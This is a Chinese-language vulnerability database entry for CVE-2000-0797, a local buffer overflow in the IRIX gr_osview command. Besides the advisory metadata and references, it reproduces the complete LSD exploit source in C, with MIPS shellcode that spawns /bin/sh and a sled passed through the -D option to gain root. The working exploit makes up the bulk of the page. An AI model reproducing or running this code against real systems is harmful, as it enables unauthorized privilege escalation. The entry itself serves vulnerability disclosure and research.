IRIX gr_osview缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105275 漏洞类型 缓冲区溢出
发布时间 1997-01-01 更新时间 2007-07-12
CVE编号 CVE-2000-0797 CNNVD-ID CNNVD-200010-027
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20126
https://www.securityfocus.com/bid/1526
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-027
|漏洞详情
IRIX6.2和6.3版本的gr_osview存在缓冲区溢出漏洞。本地用户可以借助超长-D选项获取权限。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1526/info

Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges.

The gr_osview command produces a graphical display of memory-management activity, including memory usage, page faults, TLB activity, and page swapping. This display provides a realtime window into the overall operation of the system. The buffer overflow itself is in the command-line parsing code and can be overflowed via a long user-supplied string. 
*/

/*## copyright LAST STAGE OF DELIRIUM jan 1997 poland        *://lsd-pl.net/ #*/
/*## /usr/sbin/gr_osview                                                     #*/

#define NOPNUM 3000
#define ADRNUM 3000
#define PCHNUM 1024
#define ALLIGN 1

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b;
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jan 1997 poland  //lsd-pl.net/\n");
    printf("/usr/sbin/gr_osview for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10256+1500+1024+3000;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10256+1500+1024+32636;

    b=buffer;
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execl("/usr/sbin/gr_osview","lsd","-D",buffer,0);
}
|受影响的产品
SGI IRIX 6.5.22 SGI IRIX 6.5.21 m SGI IRIX 6.5.21 f SGI IRIX 6.5.21 SGI IRIX 6.5.20 m SGI IRIX 6.5.20 f SGI IRIX 6.5.20 SGI IRIX 6.5.19 m
|参考资料

来源:XF
名称:irix-grosview-bo(5062)
链接:http://xforce.iss.net/xforce/xfdb/5062
来源:BUGTRAQ
名称:20000802[LSD]someunpublishedLSDexploitcodes
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558@ix.put.poznan.pl
来源:BID
名称:1526
链接:http://www.securityfocus.com/bid/1526
来源:OSVDB
名称:3815
链接:http://www.osvdb.org/3815
来源:SGI
名称:20040104-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20040104-01-P.asc